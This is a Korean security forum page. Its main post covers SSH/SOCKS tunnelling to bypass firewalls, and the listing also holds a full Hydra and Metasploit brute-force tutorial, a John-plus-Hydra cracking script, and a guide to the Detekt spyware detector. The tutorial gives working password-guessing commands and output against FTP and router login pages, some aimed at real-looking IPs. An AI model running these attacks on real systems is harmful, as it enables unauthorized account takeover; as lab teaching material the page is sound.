보안

해킹과 보안 #1. 방화벽을 뚫고 나가는 가장 확실한 방법

페이지 정보

profile_image
작성자 최고관리자 작성일 18-07-26 12:54 조회 1,102 댓글 0

본문

 

중국   

 

 특정 서버로 연결된 SSH 커넥션 안쪽에서 터널링을 통해 암호화통신을 하면 트래픽의 출발지와 목적지를 모두 숨길 수가 있는 것이다.

 

물론 이 방식의 단점은, 클라이언트 프로그램이 이러한 방식을 적용할 수 있도록 socks 프록시와 remote DNS 를 제공해야 하고 이런 브라우저는 비교적 메이저한 브라우저 중에는 Firefox밖에 없다.

 

 

해킹과 보안 #1. 방화벽을 뚫고 나가는 가장 확실한 방법

 

 

원본 : 

댓글목록

등록된 댓글이 없습니다.

게시물 검색
전체 4건 1 페이지
  • 열람중
    해킹과 보안 #1. 방화벽을 뚫고 나가는 가장 확실한 방법
     중국     특정 서버로 연결된 SSH 커넥션 안쪽에서 터널링을 통해 암호화통신을 하면 트래픽의 출발지와 목적지를 모두 숨길 수가 있는 것이다. 물론 이 방식의 단점은, 클라이언트 프로그램이 이러한 방식을 적용할 수 있도록 socks 프록시와 remote DNS 를 제공해야 하고 이런 브라우저는 비교적 메이저한 브라우저 중에는 Firefox밖에 없다.  해킹과 보안 #1. 방화벽을 뚫고 나가는 가장 확실한 방법  원본 : Powerblogger Z…
    작성자최고관리자 시간 07-26 조회 1103
  • Hydra를 이용한 무식공격
     Hydra를 이용한 무식공격■ 작성일 : 2012년■ 작성자 : C8KOREA■ 저작권 : 퍼가더라도 링크하나 남겨주기!! 본 자료로 인한 책임은 너가 지길.■ 첨부파일■ 테스트 환경공격자 : BT5 r3타겟: XP SP3Hydra를 스타크에 나오는 넘 처럼 좀 지저분한 툴일 수도 있으나 ftp,web,암호화 된 유무선공유기 등 다양한 분야에 걸쳐 ID,Password를 까부수는 툴이다. 여기서 좀 지저분 하다는 것은 Dictionary Attack이라는 무식한공격(Bruteforce Attack)을 사용하기 때문이다. 본자료는 테스트 용으로만 사용하고 암대나 남용하지 말길 바란다.만일 상대편이 보안장비를 운영한다면 공격에 대한 로그가 기록이 되기 때문이다.지원플랫폼과 버전정보리눅스, 윈도 둘다 돌아간다. 본좌는 백트랙5 우분투 이며 버전은 6.5이다. 히드라 공식페이지의 소스버전은 7.3이다.설치윈도용은 알아서 찾아서 다운받는다. 본좌는 BT5에 이미 설치되어 있다. 혹시 없다면 링크사이트로 가서 다운 받은 후 컴파일 하기 바란다.들어가기에 앞서좀 이해 좀 하고 사용해라 아그들아. 아래는 man page 내용이다. 읽어 보고 사용법에 들어가도록 하자.root@bt:~# man hydraHYDRA(1)                                                                        HYDRA(1)NAME       hydra - A very fast network logon cracker which support many different servicesSYNOPSIS       hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-4/6]        [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]        server service [OPT]DESCRIPTION       Hydra  is a parallized login cracker which supports numerous protocols to attack.       New modules are easy to add, beside that, it is flexible and very fast.       This tool gives researchers and security consultants the possiblity to  show  how       easy it would be to gain unauthorized access from remote to a system.       Currently this tool supports:        // 졸라 많네...이거 전부 테스트 해보도록 하자!!        AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,        HTTP-FORM-POST,  HTTP-GET,  HTTP-HEAD,  HTTP-PROXY,  HTTPS-FORM-GET, HTTPS-FORM-       POST,  HTTPS-GET, HTTPS-HEAD, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL,  NCP,  NNTP,  PCNFS,       POP3,  POSTGRES, REXEC, SAP/R3, SMB, SMTP, SNMP, SOCKS5, SSH(v1 and v2),  Subversion,        Teamspeak (TS2), TELNET, VMware-Auth, VNC and XMPP.       -R     restore a previous aborted/crashed session       -S     connect via SSL       -s PORT              if the service is on a different default port, define it here       -l LOGIN                // 사용자 이름을 이미 알고 있다면 사용한다.              or -L FILE login with LOGIN name, or load several logins from FILE       -p PASS            // 패스워드를 이미 알고 있다면 사용한다. 모를 경우 Dic파일을 이용하여 무식공격한다.              or -P FILE try password PASS, or load several passwords from FILE       -e ns  additional checks, "n" for null password, "s" try login as pass // 패스워드가 null인지 체크.       -c FILE              colon separated "login:pass" format, instead of -L/-P options       -m FILE              server list for parallel attacks, one entry per line       -o FILE              write found login/password pairs to FILE instead of stdout       -f     exit after the first found login/password pair (per host if -M)  // id,password 발견되면 빠져나와라       -t TASKS              run TASKS number of connects in parallel (default: 16)       -w TIME                 //id,password를 한번 날리고 틀리면 또 날리는데 그때 gap인 최대 대기 시간이다.              defines the max wait time in seconds for responses (default: 30)        -4 / -6                  // IP v4, v6를 지원한다. 좋구나~              prefer IPv4 (default) or IPv6 addresses       -v / -V                 // verbose 즉 화면에 보여달라는 의미다. 뭘? id, password 조합된 결과를              verbose mode / show login+pass combination for each attempt       server the target server (use either this OR the -M option)       service              the  service  to  crack.  Supported  protocols: afp cisco cisco-enable cvs              firebird ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy  icq              irc  imap  ldap2 ldap3[-{cram|digest}md5] mssql mysql ncp nntp oracle ora              cle-listener oracle-sid pcnfs pop3 pcanywhere postgres  rexec  rlogin  rsh              sapr3  sip  smb  smtp  smtp-enum  snmp socks5 ssh svn teamspeak telnet vnc              vmauthd xmpp       OPT    some service modules need special input (see README!)       -h, --help              Show summary of options.       SEE ALSO              xhydra(1), pw-inspector(1).              The programs are documented fully by van Hauser <vh@thc.org>AUTHOR       hydra was written by van Hauser / THC <vh@thc.org>  and  co-maintained  by  David       Maciejak <david.maciejak@gmail.com>.       This  manual  page was written by Daniel Echeverry <epsilon77@gmail.com>, for the       Debian project (and may be used by others).충분히 읽어 보았는가?실습 1 - FTP Attackingman page 위에 빨간색글자에 보면 다양한 분야에 무식공격을 할 수 있다고 나온다. 여기서 FTP서버의 ID, Password를 까부셔 보도록 하자.실습환경타겟 : XP SP3 알FTP서버   / userid, password : abcd, 1818공격자 : 우분투 Hydra v6.5테스트용이라 간단하게 만들었다. 졸라 암호 복잡하면 시간 오래 걸리기 때문이다.준비물 - Dictionary 파일 얻기가. 직접 만들기 : 본좌 블로그에 올려 놓았다.나. 구글링을 통해 얻기      사전파일링크 http://www.skullsecurity.org/wiki/index.php/Passwords명령어 형식 1ID를 알고 있다면 -l 사용자계정을 입력한다. 패스워드를 모르기에 -P 옵션을 이용한다. 패스워드 Dic 파일을 적고-e ns는 null 패스워드 체크를 하고 -vV는 결과를 보여주고...뒤에 타겟 IP ftp를 적어준다.# hydra -l user -P dic.txt -e ns -vV IP ftp만일 사용자 계정도 모를 경우는 아래와 같이 해준다.# hydra -L user.txt -P dic.txt -e ns -vV IP ftp추가내용 -  Metasploit를 이용한 FTP Server CrackingHydra와 비슷하게 Metasploit에서도 가능하다. 아래와 같이 해보자msf > search ftp_login                       // 모듈이 있는지 조사해보니 아래와 같은게 보일 것이다.Matching Modules+===============   Name                             Disclosure Date  Rank    Description   ----                             ---------------  ----    -----------   auxiliary/scanner/ftp/ftp_login                   normal  FTP Authentication Scannermsf > use auxiliary/scanner/ftp/ftp_login     // 해당 모듈로 접속하자msf  auxiliary(ftp_login) > set PASS_FILE /tmp/dic.txt    // 패스워드가 있는 dictionary 파일이다.PASS_FILE => /tmp/dic.txtmsf  auxiliary(ftp_login) > set USER_FILE /tmp/user.txt   // 사용자 계정의 dictionary 파일이다.USER_FILE => /tmp/user.txtmsf  auxiliary(ftp_login) > set RHOSTS 192.168.203.23     // 타겟을 정한다.RHOSTS => 192.168.203.23msf  auxiliary(ftp_login) > run     // 실행[*] 192.168.203.23:21 - Starting FTP login sweep[*] Connecting to FTP server 192.168.203.23:21...[*] Connected to target FTP server.[*]  192.168.203.23 :21 - FTP Banner: '220 ALFTP Server ready.  ^-^)/~\x0d\x0a'[*]  192.168.203.23 :21 FTP - Attempting FTP login for 'anonymous':'mozilla@example.com'[*]  192.168.203.23 :21 FTP - Failed FTP login for 'anonymous':'mozilla@example.com'[*]  192.168.203.23 :21 FTP - [1/8] - Attempting FTP login for 'abcd':''[*]  192.168.203.23 :21 FTP - [1/8] - Failed FTP login for 'abcd':''[*]  192.168.203.23 :21 FTP - [2/8] - Attempting FTP login for 'efgi':''[*]  192.168.203.23 :21 FTP - [2/8] - Failed FTP login for 'efgi':''[*]  192.168.203.23 :21 FTP - [3/8] - Attempting FTP login for 'abcd':'abcd'[*]  192.168.203.23 :21 FTP - [3/8] - Failed FTP login for 'abcd':'abcd'[*]  192.168.203.23 :21 FTP - [4/8] - Attempting FTP login for 'efgi':'efgi'[*]  192.168.203.23 :21 FTP - [4/8] - Failed FTP login for 'efgi':'efgi'[*]  192.168.203.23 :21 FTP - [5/8] - Attempting FTP login for 'abcd':'3000'[*]  192.168.203.23 :21 FTP - [5/8] - Failed FTP login for 'abcd':'3000'[*]  192.168.203.23 :21 FTP - [6/8] - Attempting FTP login for 'abcd':'1818'[+]  192.168.203.23 :21 - Successful FTP login for 'abcd':'1818'  // 성공했다는 메세지가 나온다.[*]  192.168.203.23 :21 - User 'abcd' has READ/WRITE access[*]  192.168.203.23 :21 FTP - [7/8] - Attempting FTP login for 'efgi':'3000'[*] Connecting to FTP server  192.168.203.23:21...[*] Connected to target FTP server.[*]  192.168.203.23 :21 FTP - [7/8] - Failed FTP login for 'efgi':'3000'[*]  192.168.203.23 :21 FTP - [8/8] - Attempting FTP login for 'efgi':'1818'[*]  192.168.203.23 :21 FTP - [8/8] - Failed FTP login for 'efgi':'1818'[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed테스트 결과Hydra의 경우 잘 되지 않는다. BT5에 있는 설치된 패키지로 해보니 안된다. 이유는 모르겠지만 Hydra 7.3 소스파일을 받아서 컴파일 후 직접 해봐야 것다.Metasploit의 경우는 잘 먹힌다. 방지책결국 또 강조되는 것이지만 사용자 계정은 Default로 하지 말아야 하고 Password 또한 졸라 복잡하게 만들어야 함을 다시한번알게된다.hydra -L ftp.txt -P ts-list.txt -o test.txt www.xxx.com ftp유무선공유기 id, password 무식대입법/pentest/passwords/wordlists/ap_passwords.txt -t 1 -e ns -f -V http-get /IPTime 관리자 페이지 무식공격hydra -s 80 -l admin -v -P passwords.txt -e ns -f http://192.168.0.1/cgi-bin/timepro.cgi?tmenu=main_frameHydra와 John의 만남관련 링크자료 찾아서 삽질 한 내용 정리한다. 히드라의 가장 큰 문제점을 사전파일을 만드는 것이다. 그래서 구글링해서 뒤지기 시작했다.사전파일이 아닌 john와 궁합맟춰 삽질코딩한 해커가 있다고 판단하고 구글링한 결과...있다. 역시 해커는 머리도 비상해야 하나 보다.(아래 코드로 뻘짓거리 하지 말길 바란다.)shellcode #!/bin/shhydra="/usr/local/bin/hydra"#john="/usr/bin/john"john="/pentest/passwords/john/john"        // BT5 환경에서 Path를 변경해 줘야 한다.#hydra_module="ssh2"hydra_module="http-get /"                        // 히드라 모듈#hydra_host="127.0.0.1"hydra_host="http://192.168.0.1/cgi-bin/timepro.cgi?tmenu=main_frame&smenu=main_frame"#hydra_port="22"hydra_port="80"hydra_nb_task="10"hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "john_sessionfile="$1"john_all_params="--incremental:Alpha --stdout""hydra_john.sh" 62L, 1806C                                                         1,1           Top#!/bin/shhydra="/usr/local/bin/hydra"#john="/usr/bin/john"john="/pentest/passwords/john/john"#hydra_module="ssh2"hydra_module="http-get /"#hydra_host="127.0.0.1"hydra_host="http://230.230.169.21/cgi-bin/timepro.cgi?tmenu=main_frame&smenu=main_frame"#hydra_port="22"hydra_port="80"hydra_nb_task="10"hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "john_sessionfile="$1"john_all_params="--incremental:Alpha --stdout"john_time_step=20   # time (seconds) to run johntmp_passwd="/tmp/pwd1234.tmp"hydra_logfile="/tmp/hydralog"if [ "$1" = "" ];then    echo "Usage: $0 <john session file>"    exit 0fi#for lfile in `ls $loginfiles*`;dowhile [ 1 ];do    # generate some password with john the ripper    echo; echo "- Start (re)generating passwords with John"    if [ -e "$john_sessionfile.rec" ];then        # if session exist, restore it        $john --restore=$john_sessionfile  > $tmp_passwd &    else        # if session not exist yet, create it        $john $john_all_params --session=$john_sessionfile > $tmp_passwd &    fi    # wait 100 seconds, then kill john and start hydra on it    echo "- Wait ..."    sleep $john_time_step    echo "- Kill john"    killall john 2>/dev/null 1>/dev/null    sleep 1    # start hydra    echo; echo "- Start hydra"; echo    rm -f $hydra_logfile    echo "$hydra -l admin -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"    $hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile    # if a valid pair has been found, stop the loop    if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then        echo; echo "FOUND !!"        grep $hydra_module $hydra_logfile | grep -v DATA        exit 0    fidone사용법존더리퍼와 히드라 help 메뉴얼을 보면 사용법은 그냥 알 수 있다고 본다.위의 shellcode에 답이 있으니 너가 알아서 찾길 바란다.테스트 결과타겟에서 실제 패킷을 떠보니 안나온다. 히드라 모듈 부분에 ssh2 대신 http-head, http-get 모듈로 처리하고 테스트 해보니 Error라고 나온다. 히드라 모듈 부분에서 걸리는지 뭔지 모르것다. 여튼 ssh2, ftp 모듈에서는 잘 된다고 하니 한번 테스트 해보는 것도 좋으리라 본다.시간이 나면 계속 테스트 해보도록 하것다.참조링크http://www.thc.org/thc-hydra/http://dl.packetstormsecurity.net/papers/general/thchydra-tutorial.txthttp://www.dis9.com/metasploit-attacking-the-ftp-service.htmlhttp://funoverip.net/2010/12/thc-hydra-password-bruteforcing-with-john-the-ripper/ …
    작성자최고관리자 시간 01-23 조회 5238
  • FREE Antivirus & TuneUp for PC, Mac, Android - 백신
    FREE Antivirus & TuneUp for PC, Mac, Android…
    작성자최고관리자 시간 01-03 조회 841
  • 내 컴퓨터도 해킹이 의심된다면… 해킹여부를 알려주는 프로그램 Detekt 사용법




    지난 7월 5일 이탈리아 IT기업 ‘해킹팀’이 해킹당하면서 내부자료 400GB가 유출됐다. 곧이어 해킹팀(Hacking Team)의 해킹프로그램 ‘RCS(Remote Control System)’를 구입한 고객 명단에 한국이 포함됐으며, 이는 국정원에서 카톡 검열 기능을 요청했다는 보도까지 이어졌다.
    국제앰네스티에서 지난 2014년 11월 출시한 스파이웨어 탐지 프로그램 ‘디텍트(Detekt)’는 해킹팀의 RCS 등의 스파이웨어에 해킹을 당했는지 여부를 확인할 수 있다. 윈도우를 사용하는 PC 또는 노트북에서만 사용가능하고 윈도우 10버전에서는 실행이 불가능하다는 약점이 있지만, 무료로 자가진단을 할 수 있다는 점에서 유용하게 쓰일 수 있다. 30일, 국제앰네스티를 비롯한 국제인권단체들은 8개월만에 디텍트의 업데이트 버전 2.0을 출시했다. 디텍트의 업그레이드된 기능과 사용방법 등에 대해 자세히 알아본다.

    디텍트(Detekt) 다운로드하기
    1. 파일을 다운로드한다.

    2. 현재 실행하고 있는 모든 프로그램(브라우저)을 닫고, 인터넷 연결을 끊는다.(랜선을 분리하거나, 와이파이 접속을 중단한다)
    3. 디텍트는 윈도 관리자 권한으로 실행해야 한다. 다운받은 디텍트 홈페이지에 마우스를 대고, 오른 버튼을 누르면 메뉴가 나타나는데 ‘관리자 권한으로 실행’을 클릭한다.

     
    4. 다음과 같은 화면이 뜬다. 디텍트는 암하라어, 아라비아어, 영어, 독일어, 이탈리아어, 스페인어를 지원한다. 한국어는 지원하지 않는다. 드롭다운 메뉴에서 언어를 선택한다. 기본 설정은 영어이다. <Scan now!>를 클릭하면, PC에서 스파이웨어 탐색을 시작한다.

    5. 탐색은 컴퓨터 성능에 따라 수분에서 30분까지 걸릴 수 있다. 탐색하는 동안 다음과 같은 화면이 나타난다.

    6. 탐색이 끝나면, 탐색 결과를 보여준다. 별 이상이 없을 경우, 아래와 같은 화면이 나타난다.

    7. 스파이웨어가 탐지될 경우에는 다음과 같은 화면이 나타난다. 디텍트는 기술 전문가의 검토를 위한 추가적인 세부사항을 로그 파일로 생성한다. 이를 저장하면 기술 전문가의 지원을 받는데 도움이 된다.

    디텍트(Detekt)란 무엇이며 어떤 역할을 하는가?
    ‘디텍트’는 전세계 인권옹호자와 기자를 표적으로 삼고 감시하는 데 이용된 것으로 알려진 스파이웨어의 흔적을 탐색하는 무료 소프트웨어다. 사용자에게 자신의 컴퓨터가 감시받고 있다는 사실을 알려 미리 주의할 수 있게 하는 역할을 한다. 보안 전문가들이 개발한 이 프로그램은 캐나다 비영리 연구팀 시티즌랩(Citizen Lab)이 인권활동가, 기자, 활동가를 감시하고자 정부가 스파이웨어를 사용한 사실을 조사하는 데 활용되고 있으며, 보안 전문가들이 표적 감시 활동의 특성에 대해 교육하는 과정에도 이용되고 있다.
    국제앰네스티는 프라이버시 인터내셔널(Privacy International), 디지털 게젤샤프트(Digitale Gesellschaft), 프런티어 전자재단(Electronic Frontier Foundation)과 함께 ‘디텍트’를 지난 2014년 11월 출시했다.
    새롭게 업데이트된 2.0 버전에서 달라진 점은 무엇인가?
    1.0 버전은 일반적인 안티바이러스 프로그램에서 발견되지 않는 핀피셔(FinFisher) 혹은 해킹팀의 RCS 등 특수한 스파이웨어를 식별해 냈다 하지만, 지난 7월 해킹팀이 고객들에게 발송한 이메일이 언론에 공개된 바 있다. 디텍트에 대한 대응으로 RCS사용 흔적이 드러나지 않도록 조치했다는 내용이었다. 이번에 업데이트된 새로운 디텍트는 지금까지 인지된 해킹팀의 모든 스파이웨어를 식별할 수 있다.
    디텍트 검사를 통해 ‘Danger’라는 결과가 나오면 어떻게 대처해야 하나?
    디텍트는 스파이웨어 감염을 제거하거나 의심스러운 파일을 모두 삭제하지 않는다. 디텍트 검사 결과후 스파이웨어 감염이 나타내는 경우에, 현재 사용중인 컴퓨터가 더 이상 안전하지 않은 것으로 가정해야 한다. 해킹을 시도한 쪽에서는 스파이웨어를 통해 파일과 이메일을 확인할 수 있는 것은 물론 키보드에 입력하는 내용, 심지어 원격으로 웹캠과 마이크에 접속할 수도 있다.
    먼저 감염된 컴퓨터의 사용을 중단하고 인터넷 및 다른 네트워크로부터 분리해야 한다. 당신이 입력하는 모든 키보드 입력이나 방문하는 웹사이트 등이 감시될 수 있다. 또한, 컴퓨터를 좀 더 면밀하게 검토하고, 안전하게 복구할 수 있는지 여부를 판단하기 위해 컴퓨터 전문가에게 의뢰하는 것이 좋다. 어떤 경우에는 디텍트가 잘못 판단했을 수 있다. 따라서 전문가가 컴퓨터를 검토하는 것이 필요하다 전문가에게 의뢰할 때에는 다른 컴퓨터를 이용해야 하며, 가능한 인터넷 카페나 공공 와이파이는 이용하지 않도록 한다.
    디텍트를 통해서 감염이 확인되었다면 antiropy@gmail.com 또는 jayoo@amnesty.or.kr 로 로그기록(detekt.exe 와 같은 디렉토리에 detekt.txt 파일이 있다)을 보내면 국내 전문가 및 국제앰네스티에서 검토할 수 있도록 할 예정이다.
    디텍트는 백신프로그램인가?
    디텍트는 정부에 의해 감시의 대상이 되는지 확인하는 빠른 검색 도구라고 생각하면 된다. 항상 바이러스 백신 제품을 사용하고 최신으로 업데이트하는 것이 좋다.
    애플의 맥이나 안드로이드폰, 아이폰에서도 디텍트의 사용이 가능한가?
    디텍트는 현재까지 윈도우 체제에서만 사용할 수 있다. 단, 앰네스티에서는 스마트폰과 PC 사용중 해킹을 피하는 7가지 프로그램을 추천하고 있다. (바로가기)
    또한, 안드로이드폰, 아이폰 등에 최적화된 소프트웨어는 오픈넷 진보넷, P2P재단코리아준비위원회 등 국내시민단체들이 최근 발족한 ‘국민 백신 프로젝트’에서 개발중에 있다.
    디텍트를 이용해 감시받고 있다는 사실을 성공적으로 알아낸 사례가 있는가?
    디텍트를 개발한 연구원들은 비영리연구팀 ‘시티즌랩(Citizen Lab)’ 소속으로, 시티즌랩은 전세계 여러 국가에서 인권활동가를 대상으로 불법 감시 프로그램을 사용한 사실에 대해 조사하는 과정에서 디텍트의 초기 버전을 사용했다.
    예를 들어, 시티즌랩의 조사 결과와 위키리크스(Wikileaks)가 공개한 정보에 따르면, 영국 감마 인터내셔널(Gamma International) 산하에 있던 독일 기업 핀피셔가 개발한 스파이웨어 핀스파이(FinSpy)가 바레인에서 유명 인권변호사와 활동가를 감시하는 데 사용된 것으로 밝혀졌다.
    얼마나 많은 국가 정보기관에서 감시 기술을 사용하고 있는가?
    최근 정부의 감시 기술 사용이 크게 증가하고 있으며, 특히 표적 감시를 통해 인권활동가와 기자들의 정당한 활동을 감시하는 경우가 늘고 있다. 관련 업체들이 개발한 강력한 소프트웨어를 통해 정부와 정보기관은 개인 이메일을 열람하고, 스카이프(Skype) 통화를 도청하거나 심지어는 대상이 모르게 컴퓨터 카메라와 마이크를 원격으로 작동시키는 것도 가능하게 됐다. 이렇게 수집된 정보는 주로 활동가들을 구금하거나 수감시키고, 범죄를 자백하도록 고문하는 데 이용되는 경우가 많다.
    그러나 얼마나 많은 사람들이 이러한 감시 스파이웨어의 영향을 받고 있는지에 대해서는 정확한 추정이 불가능하다. 이러한 프로그램을 개발하고 판매하는 업체들은 대상으로부터 프로그램의 존재를 철저히 숨길 수 있는 능력을 중점으로 홍보하기 때문이다.
    최근 조사 결과 현재까지 알려진 스파이웨어는 전세계 모든 지역의 수십 개 국가에서 발견된 것으로 나타났다. 디텍트는 활동가, 기자, 시민사회단체가 사용하고 있는 컴퓨터의 스파이웨어 존재 여부를 탐지할 수 있도록 보조하는 최초의 공개 프로그램이다.
    규제되지 않은 감시 장비의 거래 규모는 어느 정도인가? 이에 연루된 주요 기업과 국가는 어디인가?
    세계 감시기술 산업은 한 해 약 미화 50억달러(약 5조8천억원)의 규모일 것으로 추정되며, 그로 인한 수익 역시 매년 20%씩 증가하고 있는 것으로 보인다. 유럽과 미국 기업들은 그 동안 지속적으로 중대한 인권침해를 저지르고 있는 세계 곳곳의 국가정부에 공공연하게 감시장비와 소프트웨어를 판매해 왔다. 업계의 자발적인 규제 노력은 실패했고, 이제는 정부의 관리감독이 시급히 필요한 때다.
    프라이버시 인터내셔널이 세계 각국에 대한 사기업들의 감시장비 개발과 판매, 수출에 대해 집중 기록한 내용에 따르면, 주요 구매국은 바레인, 방글라데시, 이집트, 리비아, 모로코, 남아프리카공화국, 시리아, 투르크메니스탄 등이었다. 최근 우리나라 국가정보원에서도 이탈리아 해킹팀의 RCS를 구입, 사용했다는 사실이 외신을 통해 알려졌다.
    이러한 프로그램의 존재를 공개하면 정부가 (탐지를 피할 수 있는 새로운 장비를 도입하는 등) 감시 사실이 발각되지 않게 대처할 기회를 주는 것은 아닌가?
    정부가 효과적으로 은밀하게 국민의 디지털 통신기록을 감시할 수 있게 하는 기술은 계속해서 발전하고 있으며, 이는 전세계적으로도 마찬가지다. 세계 규모로 무차별적 집단 감시가 증가하고 있는 추세라는 사실은 에드워드 스노든(Edward Snowden)의 폭로로 세상에 알려졌다. 미국을 선두로 한 각 지역 선진국들은 이제 이러한 감시 사용을 정당화하고 있으며, 이는 세계 각국의 표현의 자유와 평화로운 집회의 자유에 충격적인 영향을 끼치고 있다.
    집단감시기술뿐만 아니라, 인권침해와 불의를 밝히기 위해 활동하는 특정한 인권활동가와 기자들만을 표적으로 삼는 정교한 기술을 사용하는 국가도 많다. 새롭게 개발되어 사용되고 있는 신규 스파이웨어는 매우 강력하고 위험해 많은 사람들을 인권침해의 위험에 빠뜨리고 있다.
    감시 기술이 더욱 정교해짐에 따라, 시민사회단체가 디지털 통신 기록을 보호하는 방법을 숙지하는 것이 무엇보다 중요해졌다. 어떤 한 가지의 프로그램이나 개입만으로 이를 해결하기엔 역부족이다. 디텍트를 통해 사람들이 감시 위협을 경계하게 되는 한편, 디텍트가 감시활동을 조사할 수 있는 새로운 접근방법이 되기를 기대한다. 그러나 장기적으로는 각국 정부에 인권 공약을 충실히 이행할 것과 정부 및 기업에 신규 기술이 인권침해에 이용되지 못하도록 하는 강력한 보호조치 마련을 촉구하는 활동도 이뤄져야 한다.
    감시 활동은 정당한 범죄 조사에 이용되기도 하는데, 왜 반대하는가?
    표적 감시는 법적으로 합리적인 혐의에 기반했을 경우, 국가 안보 보호 또는 중대한 범죄 타도와 같이 정당한 목적을 달성하기 위해 반드시 필요할 경우, 이러한 목적에 적절한 방법으로 차별 없이 시행될 경우에만 정당화될 수 있다.
    특정한 대상 없이, 또는 합당한 혐의에 기반하지 않고 광범위한 대량의 통신 기록을 수집하는 무차별 집단 감시는 절대 정당화될 수 없다. 이는 다수의 인권을 비롯해, 특히 사생활의 권리와 표현의 자유를 침해하는 것이다.
    해킹팀과 같은 기업에서 개발한 기술에 디텍트가 얼마나 효과를 발휘할 수 있는가?
    디텍트는 일부에서 사용되는 스파이웨어가 컴퓨터상에 존재하는지 찾아낼 수 있는 매우 유용한 프로그램이지만, 모든 감시 소프트웨어를 탐지하는 것은 불가능하다. 또한 스파이웨어 개발업체들이 빠르게 대응해 디텍트의 탐지를 피할 수 있도록 자사 프로그램을 업데이트할 가능성도 있다. 그렇기 때문에 새로 추가된 스파이웨어 또는 신규 버전을 파악해 디텍트가 최신 버전을 유지할 수 있도록 오픈소스 커뮤니티의 보안 전문가들에게 도움을 청하고 있다.
    디텍트가 컴퓨터상에서 스파이웨어의 흔적을 탐지하지 못했다고 해서 실제로도 스파이웨어가 존재하지 않는다고는 할 수 없다. 컴퓨터의 스파이웨어 감염 여부를 확실하게 판단하기보다, 정부가 이러한 스파이웨어를 사용하고 있다는 사실을 널리 알리고 활동가들이 이러한 위협을 더욱 경계할 수 있도록 하는 것이 디텍트의 목표다.
    또한 대중과 정부의 관련 인식 제고를 통해, 이러한 스파이웨어가 인권침해에 사용되는 것으로 알려진 국가에 판매되지 않도록 수출을 엄격히 통제하라는 압력을 더욱 높일 수 있게 될 것이다.

    디텍트 홈페이지(영문) 바로가기
    앰네스티에서 추천하는 해킹을 피하는 7가지 프로그램





    작성자최고관리자 시간 01-03 조회 1656

회원로그인

Copyright © 2001-2016 ITNANUM. All Rights Reserved..